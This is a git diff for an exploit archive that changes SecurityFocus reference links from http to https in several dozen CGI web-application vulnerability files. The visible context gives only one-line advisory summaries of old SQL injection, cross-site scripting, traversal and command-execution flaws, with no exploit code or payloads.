diff --git a/exploits/cgi/webapps/24986.txt b/exploits/cgi/webapps/24986.txt index f281faf26..5ca0b85cc 100644 --- a/exploits/cgi/webapps/24986.txt +++ b/exploits/cgi/webapps/24986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11982/info +source: https://www.securityfocus.com/bid/11982/info Multiple remote SQL injection vulnerabilities reportedly affect Ikonboard. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/cgi/webapps/25041.txt b/exploits/cgi/webapps/25041.txt index a49554bdc..a444c3e9f 100644 --- a/exploits/cgi/webapps/25041.txt +++ b/exploits/cgi/webapps/25041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12048/info +source: https://www.securityfocus.com/bid/12048/info It is reported that e_Board is vulnerable to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25042.txt b/exploits/cgi/webapps/25042.txt index 655d2b708..c42978ca4 100644 --- a/exploits/cgi/webapps/25042.txt +++ b/exploits/cgi/webapps/25042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12050/info +source: https://www.securityfocus.com/bid/12050/info Tlen.pl is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks. diff --git a/exploits/cgi/webapps/25051.txt b/exploits/cgi/webapps/25051.txt index a278b8fae..53d554953 100644 --- a/exploits/cgi/webapps/25051.txt +++ b/exploits/cgi/webapps/25051.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12097/info +source: https://www.securityfocus.com/bid/12097/info WPKontakt is reported prone to a potential script execution vulnerability. It is reported that this issue may allow remote attackers to execute arbitrary script code on a vulnerable computer, which may lead to various attacks. Arbitrary script code may be executed on a target system in the event that a specially message containing a specially malformed email address containing a JavaScript URI is received. diff --git a/exploits/cgi/webapps/25067.txt b/exploits/cgi/webapps/25067.txt index 557d4047d..27c992c8d 100644 --- a/exploits/cgi/webapps/25067.txt +++ b/exploits/cgi/webapps/25067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12395/info +source: https://www.securityfocus.com/bid/12395/info Alt-n WebAdmin is reportedly affected by multiple remote vulnerabilities. diff --git a/exploits/cgi/webapps/25096.txt b/exploits/cgi/webapps/25096.txt index 14eb30a62..380ebc455 100644 --- a/exploits/cgi/webapps/25096.txt +++ b/exploits/cgi/webapps/25096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12545/info +source: https://www.securityfocus.com/bid/12545/info A remote information disclosure vulnerability reportedly affects AWStats. This issue is due to a failure of the application to properly validate access to sensitive data. diff --git a/exploits/cgi/webapps/25108.txt b/exploits/cgi/webapps/25108.txt index b57bfd2b8..b2a3ffa30 100644 --- a/exploits/cgi/webapps/25108.txt +++ b/exploits/cgi/webapps/25108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12572/info +source: https://www.securityfocus.com/bid/12572/info AWStats is reported prone to a remote arbitrary command-execution vulnerability. This issue occurs because the application fails to properly sanitize user-supplied data. diff --git a/exploits/cgi/webapps/25147.txt b/exploits/cgi/webapps/25147.txt index 240e048eb..6c3081fda 100644 
--- a/exploits/cgi/webapps/25147.txt +++ b/exploits/cgi/webapps/25147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12620/info +source: https://www.securityfocus.com/bid/12620/info Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay. diff --git a/exploits/cgi/webapps/25201.txt b/exploits/cgi/webapps/25201.txt index aeebabe35..d86862868 100644 --- a/exploits/cgi/webapps/25201.txt +++ b/exploits/cgi/webapps/25201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12761/info +source: https://www.securityfocus.com/bid/12761/info NewsScript is reported prone to an access validation vulnerability. This issue may allow an unauthorized attacker to add, modify and delete messages. diff --git a/exploits/cgi/webapps/25331.txt b/exploits/cgi/webapps/25331.txt index 4cbf3990c..78e24bc16 100644 --- a/exploits/cgi/webapps/25331.txt +++ b/exploits/cgi/webapps/25331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12984/info +source: https://www.securityfocus.com/bid/12984/info Multiple remote input validation vulnerabilities affect SonicWALL SOHO. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/cgi/webapps/25350.txt b/exploits/cgi/webapps/25350.txt index 57b88e053..7a0cde2e1 100644 --- a/exploits/cgi/webapps/25350.txt +++ b/exploits/cgi/webapps/25350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13037/info +source: https://www.securityfocus.com/bid/13037/info It is reported that the WebWasher 'conf' script is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/25592.txt b/exploits/cgi/webapps/25592.txt index 75c0100e8..6d4ce96f5 100644 --- a/exploits/cgi/webapps/25592.txt +++ b/exploits/cgi/webapps/25592.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13482/info +source: https://www.securityfocus.com/bid/13482/info WebCrossing is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25594.txt b/exploits/cgi/webapps/25594.txt index 8d7331ff1..2f0e23c46 100644 --- a/exploits/cgi/webapps/25594.txt +++ b/exploits/cgi/webapps/25594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13484/info +source: https://www.securityfocus.com/bid/13484/info Gossamer Threads Links is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25622.txt b/exploits/cgi/webapps/25622.txt index d02a46d9e..1e5aa5c5a 100644 --- a/exploits/cgi/webapps/25622.txt +++ b/exploits/cgi/webapps/25622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13522/info +source: https://www.securityfocus.com/bid/13522/info MegaBook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25632.txt b/exploits/cgi/webapps/25632.txt index e45b57954..5490622ea 100644 --- a/exploits/cgi/webapps/25632.txt +++ b/exploits/cgi/webapps/25632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13551/info +source: https://www.securityfocus.com/bid/13551/info Easy Message Board is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. diff --git a/exploits/cgi/webapps/25634.txt b/exploits/cgi/webapps/25634.txt index d7149f089..d07fc2692 100644 --- a/exploits/cgi/webapps/25634.txt +++ b/exploits/cgi/webapps/25634.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13555/info +source: https://www.securityfocus.com/bid/13555/info Easy Message Board is prone to a remote command execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/25649.txt b/exploits/cgi/webapps/25649.txt index 6a4d892d4..2195e1d31 100644 --- a/exploits/cgi/webapps/25649.txt +++ b/exploits/cgi/webapps/25649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13598/info +source: https://www.securityfocus.com/bid/13598/info ShowOff! Digital Media Software is affected by multiple vulnerabilities. These issues can allow an attacker to carry out directory traversal and denial of service attacks. diff --git a/exploits/cgi/webapps/25666.txt b/exploits/cgi/webapps/25666.txt index f7377439d..e31cfc458 100644 --- a/exploits/cgi/webapps/25666.txt +++ b/exploits/cgi/webapps/25666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13638/info +source: https://www.securityfocus.com/bid/13638/info pServ is affected by a remote source code disclosure vulnerability. diff --git a/exploits/cgi/webapps/25668.txt b/exploits/cgi/webapps/25668.txt index 47e9ee42b..3f63e1e4c 100644 --- a/exploits/cgi/webapps/25668.txt +++ b/exploits/cgi/webapps/25668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13640/info +source: https://www.securityfocus.com/bid/13640/info Sigma ISP Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/cgi/webapps/25817.txt b/exploits/cgi/webapps/25817.txt index a069f45dc..02add3bce 100644 --- a/exploits/cgi/webapps/25817.txt +++ b/exploits/cgi/webapps/25817.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13937/info +source: https://www.securityfocus.com/bid/13937/info JamMail is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/25918.txt b/exploits/cgi/webapps/25918.txt index d7f1581c1..a496a23a0 100644 --- a/exploits/cgi/webapps/25918.txt +++ b/exploits/cgi/webapps/25918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14091/info +source: https://www.securityfocus.com/bid/14091/info imTRBBS is affected by a remote command execution vulnerability. diff --git a/exploits/cgi/webapps/25920.pl b/exploits/cgi/webapps/25920.pl index 55a23f5c6..d0ac33d6f 100755 --- a/exploits/cgi/webapps/25920.pl +++ b/exploits/cgi/webapps/25920.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14097/info +source: https://www.securityfocus.com/bid/14097/info Community Link Pro is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/25939.txt b/exploits/cgi/webapps/25939.txt index 27cba5902..3d1c504cf 100644 --- a/exploits/cgi/webapps/25939.txt +++ b/exploits/cgi/webapps/25939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14148/info +source: https://www.securityfocus.com/bid/14148/info GlobalNoteScript is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/25950.pl b/exploits/cgi/webapps/25950.pl index 64daee011..6c7cfbf1e 100755 --- a/exploits/cgi/webapps/25950.pl +++ b/exploits/cgi/webapps/25950.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14176/info +source: https://www.securityfocus.com/bid/14176/info The eRoom plug-in is prone to an insecure file download handling vulnerability. diff --git a/exploits/cgi/webapps/25952.txt b/exploits/cgi/webapps/25952.txt index a33076644..5149fb3cf 100644 --- a/exploits/cgi/webapps/25952.txt +++ b/exploits/cgi/webapps/25952.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14182/info +source: https://www.securityfocus.com/bid/14182/info pngren is prone to a remote arbitrary command execution vulnerability. diff --git a/exploits/cgi/webapps/26017.txt b/exploits/cgi/webapps/26017.txt index 87dc7e7cc..41f3b81d3 100644 --- a/exploits/cgi/webapps/26017.txt +++ b/exploits/cgi/webapps/26017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14336/info +source: https://www.securityfocus.com/bid/14336/info Greasemonkey is susceptible to multiple remote information disclosure vulnerabilities. These issues are due to a design error allowing insecure JavaScript functions to be executed by remote Web sites. diff --git a/exploits/cgi/webapps/26046.txt b/exploits/cgi/webapps/26046.txt index ccf67565e..08bb50614 100644 --- a/exploits/cgi/webapps/26046.txt +++ b/exploits/cgi/webapps/26046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14408/info +source: https://www.securityfocus.com/bid/14408/info @Mail is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26066.txt b/exploits/cgi/webapps/26066.txt index 9cf4f5e45..ec666a5b3 100644 --- a/exploits/cgi/webapps/26066.txt +++ b/exploits/cgi/webapps/26066.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14463/info +source: https://www.securityfocus.com/bid/14463/info Karrigell is susceptible to an arbitrary Python command execution vulnerability. This issue is due to a design flaw that allows remote attackers to execute Python commands that they are not intended to have access to. diff --git a/exploits/cgi/webapps/26256.txt b/exploits/cgi/webapps/26256.txt index 44c0238e4..0fd42c581 100644 --- a/exploits/cgi/webapps/26256.txt +++ b/exploits/cgi/webapps/26256.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14828/info +source: https://www.securityfocus.com/bid/14828/info MIVA Merchant 5 is prone to a cross-site scripting vulnerability.This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26289.txt b/exploits/cgi/webapps/26289.txt index 8fe7469aa..9c7f7c7d1 100644 --- a/exploits/cgi/webapps/26289.txt +++ b/exploits/cgi/webapps/26289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14893/info +source: https://www.securityfocus.com/bid/14893/info Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26290.txt b/exploits/cgi/webapps/26290.txt index e90096b99..a652d3947 100644 --- a/exploits/cgi/webapps/26290.txt +++ b/exploits/cgi/webapps/26290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14894/info +source: https://www.securityfocus.com/bid/14894/info PerlDiver is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26344.txt b/exploits/cgi/webapps/26344.txt index b0156e121..d4cc9a873 100644 --- a/exploits/cgi/webapps/26344.txt +++ b/exploits/cgi/webapps/26344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15083/info +source: https://www.securityfocus.com/bid/15083/info WebGUI is prone to an arbitrary command execution vulnerability. This is due to insufficient sanitization of user-supplied data. diff --git a/exploits/cgi/webapps/26398.txt b/exploits/cgi/webapps/26398.txt index d401cbe78..e198a0f40 100644 --- a/exploits/cgi/webapps/26398.txt +++ b/exploits/cgi/webapps/26398.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15206/info +source: https://www.securityfocus.com/bid/15206/info RSA ACE Agent is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26461.txt b/exploits/cgi/webapps/26461.txt index f05373827..2eb8d4537 100644 --- a/exploits/cgi/webapps/26461.txt +++ b/exploits/cgi/webapps/26461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26462.txt b/exploits/cgi/webapps/26462.txt index 593c00d8c..59389d9aa 100644 --- a/exploits/cgi/webapps/26462.txt +++ b/exploits/cgi/webapps/26462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26463.txt b/exploits/cgi/webapps/26463.txt index 33f5fc8d1..c4905d0df 100644 --- a/exploits/cgi/webapps/26463.txt +++ b/exploits/cgi/webapps/26463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15283/info +source: https://www.securityfocus.com/bid/15283/info Simple PHP Blog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26475.txt b/exploits/cgi/webapps/26475.txt index 16b40d7af..42384038c 100644 --- a/exploits/cgi/webapps/26475.txt +++ b/exploits/cgi/webapps/26475.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15336/info +source: https://www.securityfocus.com/bid/15336/info Asterisk is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly verify user-supplied input. diff --git a/exploits/cgi/webapps/26506.txt b/exploits/cgi/webapps/26506.txt index e36e49a2f..b24a77b96 100644 --- a/exploits/cgi/webapps/26506.txt +++ b/exploits/cgi/webapps/26506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26507.txt b/exploits/cgi/webapps/26507.txt index 9807c0834..25186c8d2 100644 --- a/exploits/cgi/webapps/26507.txt +++ b/exploits/cgi/webapps/26507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26508.txt b/exploits/cgi/webapps/26508.txt index 684a2904b..fc1d81883 100644 --- a/exploits/cgi/webapps/26508.txt +++ b/exploits/cgi/webapps/26508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26509.txt b/exploits/cgi/webapps/26509.txt index 2d7318426..9909fdafc 100644 --- a/exploits/cgi/webapps/26509.txt +++ b/exploits/cgi/webapps/26509.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15419/info +source: https://www.securityfocus.com/bid/15419/info Walla TeleSite is prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cgi/webapps/26550.txt b/exploits/cgi/webapps/26550.txt index 20ddc634b..6414da255 100644 --- a/exploits/cgi/webapps/26550.txt +++ b/exploits/cgi/webapps/26550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26551.txt b/exploits/cgi/webapps/26551.txt index 6d2155dba..654465f58 100644 --- a/exploits/cgi/webapps/26551.txt +++ b/exploits/cgi/webapps/26551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26552.txt b/exploits/cgi/webapps/26552.txt index 384aac592..f9cc22703 100644 --- a/exploits/cgi/webapps/26552.txt +++ b/exploits/cgi/webapps/26552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15537/info +source: https://www.securityfocus.com/bid/15537/info OTRS is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26716.txt b/exploits/cgi/webapps/26716.txt index dbcaa2685..172b5ab6b 100644 --- a/exploits/cgi/webapps/26716.txt +++ b/exploits/cgi/webapps/26716.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15705/info +source: https://www.securityfocus.com/bid/15705/info Easy Search System is prone to a cross-site scripting vulnerability. diff --git a/exploits/cgi/webapps/26721.txt b/exploits/cgi/webapps/26721.txt index ab367c752..1236450be 100644 --- a/exploits/cgi/webapps/26721.txt +++ b/exploits/cgi/webapps/26721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15712/info +source: https://www.securityfocus.com/bid/15712/info 1-Search is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26761.txt b/exploits/cgi/webapps/26761.txt index eec3d7d3d..cef73d292 100644 --- a/exploits/cgi/webapps/26761.txt +++ b/exploits/cgi/webapps/26761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15770/info +source: https://www.securityfocus.com/bid/15770/info It is possible for remote attackers to gain control of a target TrueMobile 2300 running firmware versions 3.0.0.8 and 5.1.1.6. Other versions are likely affected. The vulnerability appears to be in an administrative component accessed through the web-based control interface. Unauthenticated attackers can force the device to reset the administrative credentials without authorization. Once credentials have been reset an attacker can log in and perform malicious actions, potentially compromising the entire LAN behind the device. diff --git a/exploits/cgi/webapps/26771.txt b/exploits/cgi/webapps/26771.txt index af345086e..5ce78e17a 100644 --- a/exploits/cgi/webapps/26771.txt +++ b/exploits/cgi/webapps/26771.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15798/info +source: https://www.securityfocus.com/bid/15798/info Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible. diff --git a/exploits/cgi/webapps/26786.txt b/exploits/cgi/webapps/26786.txt index b0439f201..7cfe75677 100644 --- a/exploits/cgi/webapps/26786.txt +++ b/exploits/cgi/webapps/26786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15824/info +source: https://www.securityfocus.com/bid/15824/info EveryAuction is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26842.txt b/exploits/cgi/webapps/26842.txt index d1d965269..16b9cd3fd 100644 --- a/exploits/cgi/webapps/26842.txt +++ b/exploits/cgi/webapps/26842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15883/info +source: https://www.securityfocus.com/bid/15883/info SiteNet BBS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26843.txt b/exploits/cgi/webapps/26843.txt index f7ac5068d..d573d8be4 100644 --- a/exploits/cgi/webapps/26843.txt +++ b/exploits/cgi/webapps/26843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15883/info +source: https://www.securityfocus.com/bid/15883/info SiteNet BBS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26845.txt b/exploits/cgi/webapps/26845.txt index e534ef819..fd6025358 100644 --- a/exploits/cgi/webapps/26845.txt +++ b/exploits/cgi/webapps/26845.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15886/info +source: https://www.securityfocus.com/bid/15886/info Atlant Pro is prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26846.txt b/exploits/cgi/webapps/26846.txt index bf43d4689..f268fc182 100644 --- a/exploits/cgi/webapps/26846.txt +++ b/exploits/cgi/webapps/26846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15887/info +source: https://www.securityfocus.com/bid/15887/info AtlantForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26847.txt b/exploits/cgi/webapps/26847.txt index c3295a45c..56a865bfa 100644 --- a/exploits/cgi/webapps/26847.txt +++ b/exploits/cgi/webapps/26847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15889/info +source: https://www.securityfocus.com/bid/15889/info eDatCat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26848.txt b/exploits/cgi/webapps/26848.txt index e5467feab..6911b0d9f 100644 --- a/exploits/cgi/webapps/26848.txt +++ b/exploits/cgi/webapps/26848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15890/info +source: https://www.securityfocus.com/bid/15890/info ECW-Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26849.txt b/exploits/cgi/webapps/26849.txt index ce686e4eb..10546c56e 100644 --- a/exploits/cgi/webapps/26849.txt +++ b/exploits/cgi/webapps/26849.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15891/info +source: https://www.securityfocus.com/bid/15891/info ECTOOLS Onlineshop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26850.txt b/exploits/cgi/webapps/26850.txt index 382a6a4ee..f31f171b6 100644 --- a/exploits/cgi/webapps/26850.txt +++ b/exploits/cgi/webapps/26850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15892/info +source: https://www.securityfocus.com/bid/15892/info PPCal Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26851.txt b/exploits/cgi/webapps/26851.txt index 0e20c8a16..e5ede5419 100644 --- a/exploits/cgi/webapps/26851.txt +++ b/exploits/cgi/webapps/26851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15896/info +source: https://www.securityfocus.com/bid/15896/info Kryptronic ClickCartPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26852.txt b/exploits/cgi/webapps/26852.txt index c856dd3e7..63f51d8fd 100644 --- a/exploits/cgi/webapps/26852.txt +++ b/exploits/cgi/webapps/26852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15898/info +source: https://www.securityfocus.com/bid/15898/info Dick Copits PDEstore is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26858.txt b/exploits/cgi/webapps/26858.txt index 090f9db0e..b75182602 100644 --- a/exploits/cgi/webapps/26858.txt +++ b/exploits/cgi/webapps/26858.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26859.txt b/exploits/cgi/webapps/26859.txt index dc937a9b6..38609c331 100644 --- a/exploits/cgi/webapps/26859.txt +++ b/exploits/cgi/webapps/26859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26860.txt b/exploits/cgi/webapps/26860.txt index fcf8a144c..97b032005 100644 --- a/exploits/cgi/webapps/26860.txt +++ b/exploits/cgi/webapps/26860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15913/info +source: https://www.securityfocus.com/bid/15913/info binary board system is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26861.txt b/exploits/cgi/webapps/26861.txt index 95299bee9..79f6efc81 100644 --- a/exploits/cgi/webapps/26861.txt +++ b/exploits/cgi/webapps/26861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26862.txt b/exploits/cgi/webapps/26862.txt index 981e5e33d..ac7ad42f7 100644 --- a/exploits/cgi/webapps/26862.txt +++ b/exploits/cgi/webapps/26862.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26863.txt b/exploits/cgi/webapps/26863.txt index ba0c6122b..2fabb97ae 100644 --- a/exploits/cgi/webapps/26863.txt +++ b/exploits/cgi/webapps/26863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15915/info +source: https://www.securityfocus.com/bid/15915/info ScareCrow is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26864.txt b/exploits/cgi/webapps/26864.txt index a90b6a7a9..ba4d5032d 100644 --- a/exploits/cgi/webapps/26864.txt +++ b/exploits/cgi/webapps/26864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15916/info +source: https://www.securityfocus.com/bid/15916/info WebGlimpse is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cgi/webapps/26865.txt b/exploits/cgi/webapps/26865.txt index 9ccf1f4d0..032169266 100644 --- a/exploits/cgi/webapps/26865.txt +++ b/exploits/cgi/webapps/26865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15917/info +source: https://www.securityfocus.com/bid/15917/info WebCal is prone to multiple HTML injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cgi/webapps/26914.txt b/exploits/cgi/webapps/26914.txt index 94a596f19..2d92b0137 100644 --- a/exploits/cgi/webapps/26914.txt +++ b/exploits/cgi/webapps/26914.txt 
